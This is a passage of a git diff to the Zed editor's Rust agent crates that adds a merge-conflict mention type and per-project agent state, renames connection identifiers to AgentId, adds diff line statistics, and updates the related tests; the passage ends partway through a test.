b/crates/acp_thread/src/mention.rs index b63eec154a40de8909d13de2a4e1bd3e9d1e06f3..43dfe7610e34a0399a27a1d28858b938acfc2e0f 100644 --- a/crates/acp_thread/src/mention.rs +++ b/crates/acp_thread/src/mention.rs @@ -60,6 +60,9 @@ pub enum MentionUri { GitDiff { base_ref: String, }, + MergeConflict { + file_path: String, + }, } impl MentionUri { @@ -215,6 +218,9 @@ impl MentionUri { let base_ref = single_query_param(&url, "base")?.unwrap_or_else(|| "main".to_string()); Ok(Self::GitDiff { base_ref }) + } else if path.starts_with("/agent/merge-conflict") { + let file_path = single_query_param(&url, "path")?.unwrap_or_default(); + Ok(Self::MergeConflict { file_path }) } else { bail!("invalid zed url: {:?}", input); } @@ -245,6 +251,13 @@ impl MentionUri { } } MentionUri::GitDiff { base_ref } => format!("Branch Diff ({})", base_ref), + MentionUri::MergeConflict { file_path } => { + let name = Path::new(file_path) + .file_name() + .unwrap_or_default() + .to_string_lossy(); + format!("Merge Conflict ({name})") + } MentionUri::Selection { abs_path: path, line_range, @@ -306,6 +319,7 @@ impl MentionUri { MentionUri::Selection { .. } => IconName::Reader.path().into(), MentionUri::Fetch { .. } => IconName::ToolWeb.path().into(), MentionUri::GitDiff { .. } => IconName::GitBranch.path().into(), + MentionUri::MergeConflict { .. } => IconName::GitMergeConflict.path().into(), } } @@ -409,6 +423,11 @@ impl MentionUri { url.query_pairs_mut().append_pair("base", base_ref); url } + MentionUri::MergeConflict { file_path } => { + let mut url = Url::parse("zed:///agent/merge-conflict").unwrap(); + url.query_pairs_mut().append_pair("path", file_path); + url + } } } } diff --git a/crates/acp_tools/src/acp_tools.rs b/crates/acp_tools/src/acp_tools.rs index b5b0e078ae0e41f5c3527265009fac803757ff1a..30d13effcb53395972879ef109a253be0c134ec1 100644 --- a/crates/acp_tools/src/acp_tools.rs +++ b/crates/acp_tools/src/acp_tools.rs @@ -14,7 +14,7 @@ use gpui::{ }; use language::LanguageRegistry; use markdown::{CodeBlockRenderer, Markdown, MarkdownElement, MarkdownStyle}; -use project::Project; +use project::{AgentId, Project}; use settings::Settings; use theme::ThemeSettings; use ui::{CopyButton, Tooltip, WithScrollbar, prelude::*}; @@ -48,7 +48,7 @@ pub struct AcpConnectionRegistry { } struct ActiveConnection { - server_name: SharedString, + agent_id: AgentId, connection: Weak, } @@ -65,12 +65,12 @@ impl AcpConnectionRegistry { pub fn set_active_connection( &self, - server_name: impl Into, + agent_id: AgentId, connection: &Rc, cx: &mut Context, ) { self.active_connection.replace(Some(ActiveConnection { - server_name: server_name.into(), + agent_id, connection: Rc::downgrade(connection), })); cx.notify(); @@ -87,7 +87,7 @@ struct AcpTools { } struct WatchedConnection { - server_name: SharedString, + agent_id: AgentId, messages: Vec, list_state: ListState, connection: Weak, @@ -144,7 +144,7 @@ impl AcpTools { }); self.watched_connection = Some(WatchedConnection { - server_name: active_connection.server_name.clone(), + agent_id: active_connection.agent_id.clone(), messages: vec![], list_state: ListState::new(0, ListAlignment::Bottom, px(2048.)), connection: active_connection.connection.clone(), @@ -483,7 +483,7 @@ impl Item for AcpTools { "ACP: {}", self.watched_connection .as_ref() - .map_or("Disconnected", |connection| &connection.server_name) + .map_or("Disconnected", |connection| connection.agent_id.0.as_ref()) ) .into() } diff --git a/crates/action_log/src/action_log.rs b/crates/action_log/src/action_log.rs index 5679f3c58fe52057f7a4a0faa24d5b5db2b5e497..3faf767c7020763eadc7db6c93af42f650a07434 100644 --- a/crates/action_log/src/action_log.rs +++ b/crates/action_log/src/action_log.rs @@ -209,7 +209,7 @@ impl ActionLog { cx: &mut Context, ) { match event { - BufferEvent::Edited => { + BufferEvent::Edited { .. } => { let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { return; }; @@ -1028,6 +1028,11 @@ impl ActionLog { .collect() } + /// Returns the total number of lines added and removed across all unreviewed buffers. + pub fn diff_stats(&self, cx: &App) -> DiffStats { + DiffStats::all_files(&self.changed_buffers(cx), cx) + } + /// Iterate over buffers changed since last read or edited by the model pub fn stale_buffers<'a>(&'a self, cx: &'a App) -> impl Iterator> { self.tracked_buffers @@ -1044,6 +1049,46 @@ impl ActionLog { } } +#[derive(Default, Debug, Clone, Copy)] +pub struct DiffStats { + pub lines_added: u32, + pub lines_removed: u32, +} + +impl DiffStats { + pub fn single_file(buffer: &Buffer, diff: &BufferDiff, cx: &App) -> Self { + let mut stats = DiffStats::default(); + let diff_snapshot = diff.snapshot(cx); + let buffer_snapshot = buffer.snapshot(); + let base_text = diff_snapshot.base_text(); + + for hunk in diff_snapshot.hunks(&buffer_snapshot) { + let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row); + stats.lines_added += added_rows; + + let base_start = hunk.diff_base_byte_range.start.to_point(base_text).row; + let base_end = hunk.diff_base_byte_range.end.to_point(base_text).row; + let removed_rows = base_end.saturating_sub(base_start); + stats.lines_removed += removed_rows; + } + + stats + } + + pub fn all_files( + changed_buffers: &BTreeMap, Entity>, + cx: &App, + ) -> Self { + let mut total = DiffStats::default(); + for (buffer, diff) in changed_buffers { + let stats = DiffStats::single_file(buffer.read(cx), diff.read(cx), cx); + total.lines_added += stats.lines_added; + total.lines_removed += stats.lines_removed; + } + total + } +} + #[derive(Clone)] pub struct ActionLogTelemetry { pub agent_telemetry_id: SharedString, diff --git a/crates/agent/src/agent.rs b/crates/agent/src/agent.rs index d9ad55c7127983516dbb5fe0392ef135186b79f7..6437fd1883c9ddbb256babbb88041b4c42293a95 100644 --- a/crates/agent/src/agent.rs +++ b/crates/agent/src/agent.rs @@ -37,10 +37,11 @@ use futures::channel::{mpsc, oneshot}; use futures::future::Shared; use futures::{FutureExt as _, StreamExt as _, future}; use gpui::{ - App, AppContext, AsyncApp, Context, Entity, SharedString, Subscription, Task, WeakEntity, + App, AppContext, AsyncApp, Context, Entity, EntityId, SharedString, Subscription, Task, + WeakEntity, }; use language_model::{IconOrSvg, LanguageModel, LanguageModelProvider, LanguageModelRegistry}; -use project::{Project, ProjectItem, ProjectPath, Worktree}; +use project::{AgentId, Project, ProjectItem, ProjectPath, Worktree}; use prompt_store::{ ProjectContext, PromptStore, RULES_FILE_NAMES, RulesFileContext, UserRulesContext, WorktreeContext, @@ -48,9 +49,9 @@ use prompt_store::{ use serde::{Deserialize, Serialize}; use settings::{LanguageModelSelection, update_settings_file}; use std::any::Any; -use std::path::{Path, PathBuf}; +use std::path::PathBuf; use std::rc::Rc; -use std::sync::Arc; +use std::sync::{Arc, LazyLock}; use util::ResultExt; use util::path_list::PathList; use util::rel_path::RelPath; @@ -65,13 +66,23 @@ pub struct RulesLoadingError { pub message: SharedString, } +struct ProjectState { + project: Entity, + project_context: Entity, + project_context_needs_refresh: watch::Sender<()>, + _maintain_project_context: Task>, + context_server_registry: Entity, + _subscriptions: Vec, +} + /// Holds both the internal Thread and the AcpThread for a session struct Session { /// The internal thread that processes messages thread: Entity, /// The ACP thread that handles protocol communication acp_thread: Entity, - pending_save: Task<()>, + project_id: EntityId, + pending_save: Task>, _subscriptions: Vec, } @@ -235,79 +246,47 @@ pub struct NativeAgent { /// Session ID -> Session mapping sessions: HashMap, thread_store: Entity, - /// Shared project context for all threads - project_context: Entity, - project_context_needs_refresh: watch::Sender<()>, - _maintain_project_context: Task>, - context_server_registry: Entity, + /// Project-specific state keyed by project EntityId + projects: HashMap, /// Shared templates for all threads templates: Arc, /// Cached model information models: LanguageModels, - project: Entity, prompt_store: Option>, fs: Arc, _subscriptions: Vec, } impl NativeAgent { - pub async fn new( - project: Entity, + pub fn new( thread_store: Entity, templates: Arc, prompt_store: Option>, fs: Arc, - cx: &mut AsyncApp, - ) -> Result> { + cx: &mut App, + ) -> Entity { log::debug!("Creating new NativeAgent"); - let project_context = cx - .update(|cx| Self::build_project_context(&project, prompt_store.as_ref(), cx)) - .await; - - Ok(cx.new(|cx| { - let context_server_store = project.read(cx).context_server_store(); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); - - let mut subscriptions = vec![ - cx.subscribe(&project, Self::handle_project_event), - cx.subscribe( - &LanguageModelRegistry::global(cx), - Self::handle_models_updated_event, - ), - cx.subscribe( - &context_server_store, - Self::handle_context_server_store_updated, - ), - cx.subscribe( - &context_server_registry, - Self::handle_context_server_registry_event, - ), - ]; + cx.new(|cx| { + let mut subscriptions = vec![cx.subscribe( + &LanguageModelRegistry::global(cx), + Self::handle_models_updated_event, + )]; if let Some(prompt_store) = prompt_store.as_ref() { subscriptions.push(cx.subscribe(prompt_store, Self::handle_prompts_updated_event)) } - let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) = - watch::channel(()); Self { sessions: HashMap::default(), thread_store, - project_context: cx.new(|_| project_context), - project_context_needs_refresh: project_context_needs_refresh_tx, - _maintain_project_context: cx.spawn(async move |this, cx| { - Self::maintain_project_context(this, project_context_needs_refresh_rx, cx).await - }), - context_server_registry, + projects: HashMap::default(), templates, models: LanguageModels::new(cx), - project, prompt_store, fs, _subscriptions: subscriptions, } - })) + }) } fn new_session( @@ -315,10 +294,10 @@ impl NativeAgent { project: Entity, cx: &mut Context, ) -> Entity { - // Create Thread - // Fetch default model from registry settings + let project_id = self.get_or_create_project_state(&project, cx); + let project_state = &self.projects[&project_id]; + let registry = LanguageModelRegistry::read_global(cx); - // Log available models for debugging let available_count = registry.available_models(cx).count(); log::debug!("Total available models: {}", available_count); @@ -328,21 +307,22 @@ impl NativeAgent { }); let thread = cx.new(|cx| { Thread::new( - project.clone(), - self.project_context.clone(), - self.context_server_registry.clone(), + project, + project_state.project_context.clone(), + project_state.context_server_registry.clone(), self.templates.clone(), default_model, cx, ) }); - self.register_session(thread, cx) + self.register_session(thread, project_id, cx) } fn register_session( &mut self, thread_handle: Entity, + project_id: EntityId, cx: &mut Context, ) -> Entity { let connection = Rc::new(NativeAgentConnection(cx.entity())); @@ -405,12 +385,13 @@ impl NativeAgent { Session { thread: thread_handle, acp_thread: acp_thread.clone(), + project_id, _subscriptions: subscriptions, - pending_save: Task::ready(()), + pending_save: Task::ready(Ok(())), }, ); - self.update_available_commands(cx); + self.update_available_commands_for_project(project_id, cx); acp_thread } @@ -419,19 +400,106 @@ impl NativeAgent { &self.models } + fn get_or_create_project_state( + &mut self, + project: &Entity, + cx: &mut Context, + ) -> EntityId { + let project_id = project.entity_id(); + if self.projects.contains_key(&project_id) { + return project_id; + } + + let project_context = cx.new(|_| ProjectContext::new(vec![], vec![])); + self.register_project_with_initial_context(project.clone(), project_context, cx); + if let Some(state) = self.projects.get_mut(&project_id) { + state.project_context_needs_refresh.send(()).ok(); + } + project_id + } + + fn register_project_with_initial_context( + &mut self, + project: Entity, + project_context: Entity, + cx: &mut Context, + ) { + let project_id = project.entity_id(); + + let context_server_store = project.read(cx).context_server_store(); + let context_server_registry = + cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); + + let subscriptions = vec![ + cx.subscribe(&project, Self::handle_project_event), + cx.subscribe( + &context_server_store, + Self::handle_context_server_store_updated, + ), + cx.subscribe( + &context_server_registry, + Self::handle_context_server_registry_event, + ), + ]; + + let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) = + watch::channel(()); + + self.projects.insert( + project_id, + ProjectState { + project, + project_context, + project_context_needs_refresh: project_context_needs_refresh_tx, + _maintain_project_context: cx.spawn(async move |this, cx| { + Self::maintain_project_context( + this, + project_id, + project_context_needs_refresh_rx, + cx, + ) + .await + }), + context_server_registry, + _subscriptions: subscriptions, + }, + ); + } + + fn session_project_state(&self, session_id: &acp::SessionId) -> Option<&ProjectState> { + self.sessions + .get(session_id) + .and_then(|session| self.projects.get(&session.project_id)) + } + async fn maintain_project_context( this: WeakEntity, + project_id: EntityId, mut needs_refresh: watch::Receiver<()>, cx: &mut AsyncApp, ) -> Result<()> { while needs_refresh.changed().await.is_ok() { let project_context = this .update(cx, |this, cx| { - Self::build_project_context(&this.project, this.prompt_store.as_ref(), cx) - })? + let state = this + .projects + .get(&project_id) + .context("project state not found")?; + anyhow::Ok(Self::build_project_context( + &state.project, + this.prompt_store.as_ref(), + cx, + )) + })?? .await; this.update(cx, |this, cx| { - this.project_context = cx.new(|_| project_context); + if let Some(state) = this.projects.get(&project_id) { + state + .project_context + .update(cx, |current_project_context, _cx| { + *current_project_context = project_context; + }); + } })?; } @@ -594,14 +662,16 @@ impl NativeAgent { let Some(session) = self.sessions.get(session_id) else { return; }; - let thread = thread.downgrade(); - let acp_thread = session.acp_thread.downgrade(); - cx.spawn(async move |_, cx| { - let title = thread.read_with(cx, |thread, _| thread.title())?; - let task = acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?; - task.await - }) - .detach_and_log_err(cx); + + if let Some(title) = thread.read(cx).title() { + let acp_thread = session.acp_thread.downgrade(); + cx.spawn(async move |_, cx| { + let task = + acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?; + task.await + }) + .detach_and_log_err(cx); + } } fn handle_thread_token_usage_updated( @@ -620,13 +690,17 @@ impl NativeAgent { fn handle_project_event( &mut self, - _project: Entity, + project: Entity, event: &project::Event, _cx: &mut Context, ) { + let project_id = project.entity_id(); + let Some(state) = self.projects.get_mut(&project_id) else { + return; + }; match event { project::Event::WorktreeAdded(_) | project::Event::WorktreeRemoved(_) => { - self.project_context_needs_refresh.send(()).ok(); + state.project_context_needs_refresh.send(()).ok(); } project::Event::WorktreeUpdatedEntries(_, items) => { if items.iter().any(|(path, _, _)| { @@ -634,7 +708,7 @@ impl NativeAgent { .iter() .any(|name| path.as_ref() == RelPath::unix(name).unwrap()) }) { - self.project_context_needs_refresh.send(()).ok(); + state.project_context_needs_refresh.send(()).ok(); } } _ => {} @@ -647,13 +721,15 @@ impl NativeAgent { _event: &prompt_store::PromptsUpdatedEvent, _cx: &mut Context, ) { - self.project_context_needs_refresh.send(()).ok(); + for state in self.projects.values_mut() { + state.project_context_needs_refresh.send(()).ok(); + } } fn handle_models_updated_event( &mut self, _registry: Entity, - _event: &language_model::Event, + event: &language_model::Event, cx: &mut Context, ) { self.models.refresh_list(cx); @@ -670,37 +746,65 @@ impl NativeAgent { thread.set_model(model, cx); cx.notify(); } - thread.set_summarization_model(summarization_model.clone(), cx); + if let Some(model) = summarization_model.clone() { + if thread.summarization_model().is_none() + || matches!(event, language_model::Event::ThreadSummaryModelChanged) + { + thread.set_summarization_model(Some(model), cx); + } + } }); } } fn handle_context_server_store_updated( &mut self, - _store: Entity, + store: Entity, _event: &project::context_server_store::ServerStatusChangedEvent, cx: &mut Context, ) { - self.update_available_commands(cx); + let project_id = self.projects.iter().find_map(|(id, state)| { + if *state.context_server_registry.read(cx).server_store() == store { + Some(*id) + } else { + None + } + }); + if let Some(project_id) = project_id { + self.update_available_commands_for_project(project_id, cx); + } } fn handle_context_server_registry_event( &mut self, - _registry: Entity, + registry: Entity, event: &ContextServerRegistryEvent, cx: &mut Context, ) { match event { ContextServerRegistryEvent::ToolsChanged => {} ContextServerRegistryEvent::PromptsChanged => { - self.update_available_commands(cx); + let project_id = self.projects.iter().find_map(|(id, state)| { + if state.context_server_registry == registry { + Some(*id) + } else { + None + } + }); + if let Some(project_id) = project_id { + self.update_available_commands_for_project(project_id, cx); + } } } } - fn update_available_commands(&self, cx: &mut Context) { - let available_commands = self.build_available_commands(cx); + fn update_available_commands_for_project(&self, project_id: EntityId, cx: &mut Context) { + let available_commands = + Self::build_available_commands_for_project(self.projects.get(&project_id), cx); for session in self.sessions.values() { + if session.project_id != project_id { + continue; + } session.acp_thread.update(cx, |thread, cx| { thread .handle_session_update( @@ -714,8 +818,14 @@ impl NativeAgent { } } - fn build_available_commands(&self, cx: &App) -> Vec { - let registry = self.context_server_registry.read(cx); + fn build_available_commands_for_project( + project_state: Option<&ProjectState>, + cx: &App, + ) -> Vec { + let Some(state) = project_state else { + return vec![]; + }; + let registry = state.context_server_registry.read(cx); let mut prompt_name_counts: HashMap<&str, usize> = HashMap::default(); for context_server_prompt in registry.prompts() { @@ -769,6 +879,7 @@ impl NativeAgent { pub fn load_thread( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task>> { let database_future = ThreadsDatabase::connect(cx); @@ -780,41 +891,49 @@ impl NativeAgent { .with_context(|| format!("no thread found with ID: {id:?}"))?; this.update(cx, |this, cx| { + let project_id = this.get_or_create_project_state(&project, cx); + let project_state = this + .projects + .get(&project_id) + .context("project state not found")?; let summarization_model = LanguageModelRegistry::read_global(cx) .thread_summary_model() .map(|c| c.model); - cx.new(|cx| { + Ok(cx.new(|cx| { let mut thread = Thread::from_db( id.clone(), db_thread, - this.project.clone(), - this.project_context.clone(), - this.context_server_registry.clone(), + project_state.project.clone(), + project_state.project_context.clone(), + project_state.context_server_registry.clone(), this.templates.clone(), cx, ); thread.set_summarization_model(summarization_model, cx); thread - }) - }) + })) + })? }) } pub fn open_thread( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task>> { if let Some(session) = self.sessions.get(&id) { return Task::ready(Ok(session.acp_thread.clone())); } - let task = self.load_thread(id, cx); + let task = self.load_thread(id, project.clone(), cx); cx.spawn(async move |this, cx| { let thread = task.await?; - let acp_thread = - this.update(cx, |this, cx| this.register_session(thread.clone(), cx))?; + let acp_thread = this.update(cx, |this, cx| { + let project_id = this.get_or_create_project_state(&project, cx); + this.register_session(thread.clone(), project_id, cx) + })?; let events = thread.update(cx, |thread, cx| thread.replay(cx)); cx.update(|cx| { NativeAgentConnection::handle_thread_events(events, acp_thread.downgrade(), cx) @@ -827,9 +946,10 @@ impl NativeAgent { pub fn thread_summary( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task> { - let thread = self.open_thread(id.clone(), cx); + let thread = self.open_thread(id.clone(), project, cx); cx.spawn(async move |this, cx| { let acp_thread = thread.await?; let result = this @@ -857,8 +977,13 @@ impl NativeAgent { return; }; + let project_id = session.project_id; + let Some(state) = self.projects.get(&project_id) else { + return; + }; + let folder_paths = PathList::new( - &self + &state .project .read(cx) .visible_worktrees(cx) @@ -875,7 +1000,7 @@ impl NativeAgent { let thread_store = self.thread_store.clone(); session.pending_save = cx.spawn(async move |_, cx| { let Some(database) = database_future.await.map_err(|err| anyhow!(err)).log_err() else { - return; + return Ok(()); }; let db_thread = db_thread.await; database @@ -883,21 +1008,29 @@ impl NativeAgent { .await .log_err(); thread_store.update(cx, |store, cx| store.reload(cx)); + Ok(()) }); } fn send_mcp_prompt( &self, message_id: UserMessageId, - session_id: agent_client_protocol::SessionId, + session_id: acp::SessionId, prompt_name: String, server_id: ContextServerId, arguments: HashMap, original_content: Vec, cx: &mut Context, ) -> Task> { - let server_store = self.context_server_registry.read(cx).server_store().clone(); - let path_style = self.project.read(cx).path_style(cx); + let Some(state) = self.session_project_state(&session_id) else { + return Task::ready(Err(anyhow!("Project state not found for session"))); + }; + let server_store = state + .context_server_registry + .read(cx) + .server_store() + .clone(); + let path_style = state.project.read(cx).path_style(cx); cx.spawn(async move |this, cx| { let prompt = @@ -996,8 +1129,14 @@ impl NativeAgentConnection { .map(|session| session.thread.clone()) } - pub fn load_thread(&self, id: acp::SessionId, cx: &mut App) -> Task>> { - self.0.update(cx, |this, cx| this.load_thread(id, cx)) + pub fn load_thread( + &self, + id: acp::SessionId, + project: Entity, + cx: &mut App, + ) -> Task>> { + self.0 + .update(cx, |this, cx| this.load_thread(id, project, cx)) } fn run_turn( @@ -1068,12 +1207,11 @@ impl NativeAgentConnection { thread.request_tool_call_authorization(tool_call, options, cx) })??; cx.background_spawn(async move { - if let acp::RequestPermissionOutcome::Selected( - acp::SelectedPermissionOutcome { option_id, .. }, - ) = outcome_task.await + if let acp_thread::RequestPermissionOutcome::Selected(outcome) = + outcome_task.await { response - .send(option_id) + .send(outcome) .map(|_| anyhow!("authorization receiver was dropped")) .log_err(); } @@ -1090,6 +1228,9 @@ impl NativeAgentConnection { thread.update_tool_call(update, cx) })??; } + ThreadEvent::Plan(plan) => { + acp_thread.update(cx, |thread, cx| thread.update_plan(plan, cx))?; + } ThreadEvent::SubagentSpawned(session_id) => { acp_thread.update(cx, |thread, cx| { thread.subagent_spawned(session_id, cx); @@ -1255,7 +1396,13 @@ impl acp_thread::AgentModelSelector for NativeAgentModelSelector { } } +pub static ZED_AGENT_ID: LazyLock = LazyLock::new(|| AgentId::new("Zed Agent")); + impl acp_thread::AgentConnection for NativeAgentConnection { + fn agent_id(&self) -> AgentId { + ZED_AGENT_ID.clone() + } + fn telemetry_id(&self) -> SharedString { "zed".into() } @@ -1263,10 +1410,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { - log::debug!("Creating new thread for project at: {cwd:?}"); + log::debug!("Creating new thread for project at: {work_dirs:?}"); Task::ready(Ok(self .0 .update(cx, |agent, cx| agent.new_session(project, cx)))) @@ -1279,24 +1426,42 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn load_session( self: Rc, session_id: acp::SessionId, - _project: Entity, - _cwd: &Path, + project: Entity, + _work_dirs: PathList, _title: Option, cx: &mut App, ) -> Task>> { self.0 - .update(cx, |agent, cx| agent.open_thread(session_id, cx)) + .update(cx, |agent, cx| agent.open_thread(session_id, project, cx)) } fn supports_close_session(&self) -> bool { true } - fn close_session(&self, session_id: &acp::SessionId, cx: &mut App) -> Task> { - self.0.update(cx, |agent, _cx| { - agent.sessions.remove(session_id); - }); - Task::ready(Ok(())) + fn close_session( + self: Rc, + session_id: &acp::SessionId, + cx: &mut App, + ) -> Task> { + self.0.update(cx, |agent, cx| { + let thread = agent.sessions.get(session_id).map(|s| s.thread.clone()); + if let Some(thread) = thread { + agent.save_thread(thread, cx); + } + + let Some(session) = agent.sessions.remove(session_id) else { + return Task::ready(Ok(())); + }; + let project_id = session.project_id; + + let has_remaining = agent.sessions.values().any(|s| s.project_id == project_id); + if !has_remaining { + agent.projects.remove(&project_id); + } + + session.pending_save + }) } fn auth_methods(&self) -> &[acp::AuthMethod] { @@ -1325,8 +1490,12 @@ impl acp_thread::AgentConnection for NativeAgentConnection { log::info!("Received prompt request for session: {}", session_id); log::debug!("Prompt blocks count: {}", params.prompt.len()); + let Some(project_state) = self.0.read(cx).session_project_state(&session_id) else { + return Task::ready(Err(anyhow::anyhow!("Session not found"))); + }; + if let Some(parsed_command) = Command::parse(¶ms.prompt) { - let registry = self.0.read(cx).context_server_registry.read(cx); + let registry = project_state.context_server_registry.read(cx); let explicit_server_id = parsed_command .explicit_server_id @@ -1362,10 +1531,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection { cx, ) }); - }; + } }; - let path_style = self.0.read(cx).project.read(cx).path_style(cx); + let path_style = project_state.project.read(cx).path_style(cx); self.run_turn(session_id, cx, move |thread, cx| { let content: Vec = params @@ -1406,7 +1575,7 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn truncate( &self, - session_id: &agent_client_protocol::SessionId, + session_id: &acp::SessionId, cx: &App, ) -> Option> { self.0.read_with(cx, |agent, _cx| { @@ -1611,6 +1780,7 @@ impl NativeThreadEnvironment { }; let parent_thread = parent_thread_entity.read(cx); let current_depth = parent_thread.depth(); + let parent_session_id = parent_thread.id().clone(); if current_depth >= MAX_SUBAGENT_DEPTH { return Err(anyhow!( @@ -1627,9 +1797,16 @@ impl NativeThreadEnvironment { let session_id = subagent_thread.read(cx).id().clone(); - let acp_thread = self.agent.update(cx, |agent, cx| { - agent.register_session(subagent_thread.clone(), cx) - })?; + let acp_thread = self + .agent + .update(cx, |agent, cx| -> Result> { + let project_id = agent + .sessions + .get(&parent_session_id) + .map(|s| s.project_id) + .context("parent session not found")?; + Ok(agent.register_session(subagent_thread.clone(), project_id, cx)) + })??; let depth = current_depth + 1; @@ -1929,6 +2106,8 @@ impl TerminalHandle for AcpTerminalHandle { #[cfg(test)] mod internal_tests { + use std::path::Path; + use super::*; use acp_thread::{AgentConnection, AgentModelGroupName, AgentModelInfo, MentionUri}; use fs::FakeFs; @@ -1955,18 +2134,32 @@ mod internal_tests { .await; let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); + + // Creating a session registers the project and triggers context building. + let connection = NativeAgentConnection(agent.clone()); + let _acp_thread = cx + .update(|cx| { + Rc::new(connection).new_session( + project.clone(), + PathList::new(&[Path::new("/")]), + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + + let thread = agent.read_with(cx, |agent, _cx| { + agent.sessions.values().next().unwrap().thread.clone() + }); + agent.read_with(cx, |agent, cx| { - assert_eq!(agent.project_context.read(cx).worktrees, vec![]) + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); + assert_eq!(state.project_context.read(cx).worktrees, vec![]); + assert_eq!(thread.read(cx).project_context().read(cx).worktrees, vec![]); }); let worktree = project @@ -1975,36 +2168,44 @@ mod internal_tests { .unwrap(); cx.run_until_parked(); agent.read_with(cx, |agent, cx| { + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); + let expected_worktrees = vec![WorktreeContext { + root_name: "a".into(), + abs_path: Path::new("/a").into(), + rules_file: None, + }]; + assert_eq!(state.project_context.read(cx).worktrees, expected_worktrees); assert_eq!( - agent.project_context.read(cx).worktrees, - vec![WorktreeContext { - root_name: "a".into(), - abs_path: Path::new("/a").into(), - rules_file: None - }] - ) + thread.read(cx).project_context().read(cx).worktrees, + expected_worktrees + ); }); // Creating `/a/.rules` updates the project context. fs.insert_file("/a/.rules", Vec::new()).await; cx.run_until_parked(); agent.read_with(cx, |agent, cx| { + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); let rules_entry = worktree .read(cx) .entry_for_path(rel_path(".rules")) .unwrap(); + let expected_worktrees = vec![WorktreeContext { + root_name: "a".into(), + abs_path: Path::new("/a").into(), + rules_file: Some(RulesFileContext { + path_in_worktree: rel_path(".rules").into(), + text: "".into(), + project_entry_id: rules_entry.id.to_usize(), + }), + }]; + assert_eq!(state.project_context.read(cx).worktrees, expected_worktrees); assert_eq!( - agent.project_context.read(cx).worktrees, - vec![WorktreeContext { - root_name: "a".into(), - abs_path: Path::new("/a").into(), - rules_file: Some(RulesFileContext { - path_in_worktree: rel_path(".rules").into(), - text: "".into(), - project_entry_id: rules_entry.id.to_usize() - }) - }] - ) + thread.read(cx).project_context().read(cx).worktrees, + expected_worktrees + ); }); } @@ -2015,23 +2216,19 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let connection = NativeAgentConnection( - NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(), - ); + let connection = + NativeAgentConnection(cx.update(|cx| { + NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx) + })); // Create a thread/session let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2095,22 +2292,18 @@ mod internal_tests { let thread_store = cx.new(|cx| ThreadStore::new(cx)); // Create the agent and connection - let agent = NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); // Create a thread/session let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2196,21 +2389,17 @@ mod internal_tests { let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2281,6 +2470,61 @@ mod internal_tests { }); } + #[gpui::test] + async fn test_summarization_model_survives_transient_registry_clearing( + cx: &mut TestAppContext, + ) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/", json!({ "a": {} })).await; + let project = Project::test(fs.clone(), [], cx).await; + + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) + }) + .await + .unwrap(); + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + + thread.read_with(cx, |thread, _| { + assert!( + thread.summarization_model().is_some(), + "session should have a summarization model from the test registry" + ); + }); + + // Simulate what happens during 